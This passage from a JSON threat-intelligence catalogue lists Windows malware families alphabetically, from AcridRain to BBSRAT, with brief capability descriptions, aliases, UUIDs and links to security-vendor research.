It can also dump Telegram and Steam sessions, rob Filezilla recent connections, and more.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain", "https://thisissecurity.stormshield.com/2018/08/28/acridrain-stealer/" ], "synonyms": [], "type": [] }, "uuid": "ffc368a5-2cd0-44ca-869b-223fdb462c41", "value": "AcridRain" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym", "https://www.arbornetworks.com/blog/asert/acronym-m-is-for-malware/" ], "synonyms": [], "type": [] }, "uuid": "bee73d0f-8ff3-44ba-91dc-d883884c754e", "value": "Acronym" }, { "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016", "https://twitter.com/JaromirHorejsi/status/813712587997249536" ], "synonyms": [], "type": [] }, "uuid": "1ed36f9a-ae00-4d16-bbf7-e97217385fb1", "value": "AdamLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adkoob", "https://news.sophos.com/en-us/2018/07/29/adkoob-information-thief-targets-facebook-ad-purchase-info/" ], "synonyms": [], "type": [] }, "uuid": "ace3cb99-3523-44a1-92cc-9f002cf364bf", "value": "AdKoob" }, { "description": "AdvisorsBot is a downloader named after early command and control domains that all contained the word \"advisors\". 
The malware is written in C and employs a number of anti-analysis features such as junk code, stack strings and Windows API function hashing.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot", "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot" ], "synonyms": [], "type": [] }, "uuid": "e3f49ec0-614e-4070-a620-5196d45df7b5", "value": "AdvisorsBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz", "https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar" ], "synonyms": [], "type": [] }, "uuid": "3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58", "value": "Adylkuzz" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz", "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/", "https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html", "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", "http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/", "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat" ], "synonyms": [ "ComRAT", "Sun rootkit" ], "type": [] }, "uuid": "d9cc15f7-0880-4ae4-8df4-87c58338d6b8", "value": "Agent.BTZ" }, { "description": "A .NET based keylogger and RAT readily available to actors. 
Logs keystrokes and the host's clipboard and beacons this information back to the C2.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/", "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/", "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting", "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr", "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html", "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/", "https://blogs.forcepoint.com/security-labs/part-two-camouflage-netting" ], "synonyms": [], "type": [] }, "uuid": "b88e29cf-79d9-42bc-b369-0383b5e04380", "value": "Agent Tesla" }, { "description": "According to Trend Micro Encyclopedia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. 
Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/aldibot" ], "synonyms": [], "type": [] }, "uuid": "43ec8adc-0658-4765-be20-f22679097fab", "value": "Aldibot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm", "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/" ], "synonyms": [], "type": [] }, "uuid": "41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca", "value": "Project Alice" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alina_pos", "http://www.xylibox.com/2013/02/alina-34-pos-malware.html", "https://www.nuix.com/blog/alina-continues-spread-its-wings", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/", "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/" ], "synonyms": [ "alina_eagle", "alina_spark", "katrina" ], "type": [] }, "uuid": "27d90cd6-095a-4c28-a6f2-d1b47eae4f70", "value": "Alina POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple", "https://trapx.com/wp-content/uploads/2017/08/White_Paper_TrapX_AllapleWorm.pdf", "https://researchcenter.paloaltonetworks.com/2014/08/hunting-mutex/" ], "synonyms": [ "Starman" ], "type": [] }, 
"uuid": "6aabb492-e282-40fb-a840-fe4e643ec094", "value": "Allaple" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/" ], "synonyms": [], "type": [] }, "uuid": "a0881a0c-e677-495b-b475-290af09bb716", "value": "Alma Communicator" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker" ], "synonyms": [], "type": [] }, "uuid": "b5138914-6c2b-4c8e-b182-d94973fe5a6b", "value": "AlmaLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe", "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" ], "synonyms": [], "type": [] }, "uuid": "86517f1a-6e67-47ba-95dd-84b3125ad983", "value": "ALPC Local PrivEsc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware", "https://twitter.com/JaromirHorejsi/status/813714602466877440" ], "synonyms": [], "type": [] }, "uuid": "5060756f-8385-465d-a7dd-7bf09a54da92", "value": "Alphabet Ransomware" }, { "description": "AlphaLocker is a new form of ransomware built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.\r\n\r\nAlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. 
A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. The ransomware's author is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.\r\n\r\nAlphaLocker's encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user's computer and saving the private key to its server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key and sends it to the C&C server.\r\n\r\nTo decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphalocker", "https://blog.cylance.com/an-introduction-to-alphalocker" ], "synonyms": [], "type": [] }, "uuid": "c1b9e8c5-9283-4dbe-af10-45956a446fb7", "value": "AlphaLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" ], "synonyms": [], "type": [] }, "uuid": "6e94186c-987e-43da-be2d-9b44f254c8b9", "value": "AlphaNC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay", "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" ], "synonyms": [], "type": [] }, "uuid": "d258de39-e351-47e3-b619-731c87f13d9c", "value": "Alreay" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon", 
"http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html", "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html", "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html" ], "synonyms": [ "Olmarik", "Pihar", "TDL", "TDSS" ], "type": [] }, "uuid": "ad4e6779-59a6-4ad6-98de-6bd871ddb271", "value": "Alureon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol", "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/", "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" ], "synonyms": [ "Adupihan" ], "type": [] }, "uuid": "ce25929c-0358-477c-a85e-f0bdfcc99a54", "value": "AMTsol" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda", "https://blog.fortinet.com/2014/04/16/a-good-look-at-the-andromeda-botnet", "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", "https://blog.avast.com/andromeda-under-the-microscope", "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", "http://blog.morphisec.com/andromeda-tactics-analyzed", "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis", "http://resources.infosecinstitute.com/andromeda-bot-analysis/", "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/", "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08", "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/", "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/", 
"https://eternal-todo.com/blog/andromeda-gamarue-loves-json", "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features", "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html" ], "synonyms": [ "B106-Gamarue", "B67-SS-Gamarue", "Gamarue", "b66" ], "type": [] }, "uuid": "07f46d21-a5d4-4359-8873-18e30950df1a", "value": "Andromeda" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel", "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/" ], "synonyms": [], "type": [] }, "uuid": "a180afcc-d42d-4600-b70f-af27aaf851b7", "value": "Anel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.antilam" ], "synonyms": [ "Latinus" ], "type": [] }, "uuid": "02be7f3a-f3bf-447b-b8b4-c78432b82694", "value": "Antilam" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto", "https://www.visakorea.com/dam/VCOM/download/merchants/Grocery_Malware_04242013.pdf" ], "synonyms": [], "type": [] }, "uuid": "d3e16d46-e436-4757-b962-6fd393056415", "value": "Apocalipto" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalypse_ransom", "http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/" ], "synonyms": [], "type": [] }, "uuid": "e87d9df4-b464-4458-ae1f-31cea40d5f96", "value": "Apocalypse" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax" ], "synonyms": [], "type": [] }, "uuid": "4f5c2f8b-06ef-4fb3-b03c-afdcafa88de5", "value": "ArdaMax" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arefty", "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" ], "synonyms": [], "type": [] }, "uuid": "bf135b0a-3120-42c4-ba58-c80f9ef689bf", 
"value": "Arefty" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger", "http://remote-keylogger.net/", "https://www.invincea.com/2016/09/crimeware-as-a-service-goes-mainstream/" ], "synonyms": [ "Aaron Keylogger" ], "type": [] }, "uuid": "3572d725-bf13-43ef-9511-bdbb7692ab06", "value": "Arik Keylogger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arkei_stealer", "https://www.bleepingcomputer.com/news/security/hacker-breaches-syscoin-github-account-and-poisons-official-client/" ], "synonyms": [], "type": [] }, "uuid": "59eff508-7f26-4fd8-b526-5772a9f3d9a6", "value": "Arkei Stealer" }, { "description": "ARS Loader, also known as ARS VBS Loader, is written in Visual Basic Script, and its main purpose is to control an infected machine via different available commands, acting as a remote access trojan (RAT). Its code is based on ASPC, another Visual Basic Script malware, which in turn seems to be based on SafeLoader.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ars_loader", "https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/", "https://twitter.com/Racco42/status/1001374490339790849", "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/" ], "synonyms": [], "type": [] }, "uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795", "value": "ARS VBS Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader" ], "synonyms": [], "type": [] }, "uuid": "4e3fa4e6-bc7d-4024-b191-ccafa5347c13", "value": "AscentLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aspc" ], "synonyms": [], "type": [] }, "uuid": "bc128d41-33e6-40ec-aaf2-9a05da9a0a27", "value": "ASPC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox", 
"https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/", "https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign", "http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/" ], "synonyms": [ "Aseljo", "BadSrc" ], "type": [] }, "uuid": "ba557993-f64e-4538-8f13-dafaa3c0db00", "value": "Asprox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.athenago", "http://blog.talosintel.com/2017/02/athena-go.html" ], "synonyms": [], "type": [] }, "uuid": "587eff78-47be-4022-a1b5-7857340a9ab2", "value": "AthenaGo RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" ], "synonyms": [], "type": [] }, "uuid": "e248d80d-de8e-45de-b6d0-3740e5b34573", "value": "ATI-Agent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii", "https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/" ], "synonyms": [], "type": [] }, "uuid": "f2a7c867-6380-4cbe-b524-50727a29f0c6", "value": "ATMii" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch", "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/" ], "synonyms": [], "type": [] }, "uuid": "5f427b3a-7162-4421-b2cd-e6588d518448", "value": "ATMitch" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere", "https://www.group-ib.com/resources/threat-research/silence.html" ], "synonyms": [], "type": [] }, "uuid": "15918921-93b8-4b3a-a612-e1d1f769c420", "value": "Atmosphere" }, { "description": "The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll.\r\nBoth 
libraries are legitimate Windows drivers used to interact with the components of different ATM models.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter", "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf", "https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf" ], "synonyms": [], "type": [] }, "uuid": "5a03a6ff-e127-4cd2-aab1-75f1e3ecc187", "value": "ATMSpitter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.august_stealer", "https://www.proofpoint.com/us/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene", "https://hazmalware.blogspot.de/2016/12/analysis-of-august-stealer-malware.html" ], "synonyms": [], "type": [] }, "uuid": "2ee0122a-701d-487d-9ac1-7d91e4f99d78", "value": "August Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.auriga", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [ "Riodrv" ], "type": [] }, "uuid": "e3065e43-503b-4496-921b-7601dd3d6abd", "value": "Auriga" }, { "description": "Ransomware", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora", "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/" ], "synonyms": [], "type": [] }, "uuid": "2f899e3e-1a46-43ea-8e68-140603ce943d", "value": "Aurora" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler", "https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/" ], "synonyms": [], "type": [] }, "uuid": "96a695de-2560-4f10-bbd6-3bc2ac27b7f7", "value": "AvastDisabler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt", 
"https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/" ], "synonyms": [], "type": [] }, "uuid": "0568fcc6-755f-416e-9c5b-22232cd7ae0e", "value": "AVCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo", "http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/" ], "synonyms": [], "type": [] }, "uuid": "606b160a-5180-4255-a1db-b2b9e8a52e95", "value": "Aveo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan", "https://blog.malwarebytes.com/threat-analysis/2018/02/avzhan-ddos-bot-dropped-by-chinese-drive-by-attack/" ], "synonyms": [], "type": [] }, "uuid": "b12d9354-f67b-47dd-944c-82cfdff7b9a3", "value": "Avzhan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent" ], "synonyms": [], "type": [] }, "uuid": "c84a6b0b-28a5-4293-b8fc-6a6eeb7b5f70", "value": "Ayegent" }, { "description": "AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. 
It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult", "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers", "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside", "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", "https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/" ], "synonyms": [ "PuffStealer", "Rultazo" ], "type": [] }, "uuid": "0dfbe48e-a3da-4265-975e-1eb37ad9c51c", "value": "Azorult" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar", "http://www.spiegel.de/media/media-35683.pdf", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/", "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/", "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", "https://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/" ], "synonyms": [ "SNOWBALL" ], "type": [] }, "uuid": "947dffa1-0184-48d4-998e-1899ad97e93e", "value": "Babar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal", 
"https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" ], "synonyms": [], "type": [] }, "uuid": "30c2e5c6-851d-4f3a-8b6e-2e7b69a26467", "value": "BABYMETAL" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.backnet", "https://github.com/valsov/BackNet" ], "synonyms": [], "type": [] }, "uuid": "e2840cc1-c43d-4542-9818-a3c15a0f9f7a", "value": "BackNet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "23398248-a52a-4a7c-af10-262822d33a4e", "value": "backspace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap", "https://securityintelligence.com/backswap-malware-now-targets-six-banks-in-spain/", "https://www.f5.com/labs/articles/threat-intelligence/backswap-defrauds-online-banking-customers-using-hidden-input-fi", "https://www.cert.pl/en/news/single/backswap-malware-analysis/", "https://research.checkpoint.com/the-evolution-of-backswap/", "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/", "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/" ], "synonyms": [], "type": [] }, "uuid": "4ec40af9-0295-4b9a-81ad-b7017a21609d", "value": "BackSwap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript", "https://twitter.com/PhysicalDrive0/status/833067081981710336" ], "synonyms": [], "type": [] }, "uuid": "af1c99be-e55a-473e-abed-726191e1da05", "value": "BadEncript" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick", 
"https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" ], "synonyms": [], "type": [] }, "uuid": "1eceb5c0-3a01-43c2-b204-9957b15cf763", "value": "badflick" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews", "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1", "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2" ], "synonyms": [], "type": [] }, "uuid": "f28fa5ca-9466-410c-aa32-4bd102f3f0e1", "value": "BadNews" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle" ], "synonyms": [], "type": [] }, "uuid": "f09af1cc-cf9d-499a-9026-e783a3897508", "value": "Bagle" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bahamut", "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" ], "synonyms": [], "type": [] }, "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", "value": "Bahamut (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix", "https://www.cert.pl/en/news/single/banatrix-an-indepth-look/" ], "synonyms": [], "type": [] }, "uuid": "721fe429-f240-4fd6-a5c9-187195624b51", "value": "Banatrix" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat", "https://www.slideshare.net/YuryChemerkin/appendix-c-digital-the-malware-arsenal" ], "synonyms": [], "type": [] }, "uuid": "5c3c53ff-c81f-4daa-9b60-672650046ed7", "value": "bangat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori", "http://blog.kleissner.org/?p=69", "http://osint.bambenekconsulting.com/feeds/", "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/", "http://blog.kleissner.org/?p=192" ], "synonyms": [ "BackPatcher", "BankPatch", "MultiBanker 2" ], "type": [] }, "uuid": "137cde28-5c53-489b-ad0b-d0fa2e342324", "value": "Banjori" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot", "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF", "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/" ], "synonyms": [], "type": [] }, "uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886", "value": "Bankshot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart" ], "synonyms": [], "type": [] }, "uuid": "1dfd3ba6-7f82-407f-958d-c4a2ac055123", "value": "Bart" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper", "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html" ], "synonyms": [], "type": [] }, "uuid": "b74747e0-59ac-4adf-baac-78213a234ff5", "value": "BatchWiper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel" ], "synonyms": [], "type": [] }, "uuid": "3900aa45-a7ff-48cc-9ac0-58c7c372991e", "value": "Batel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat", 
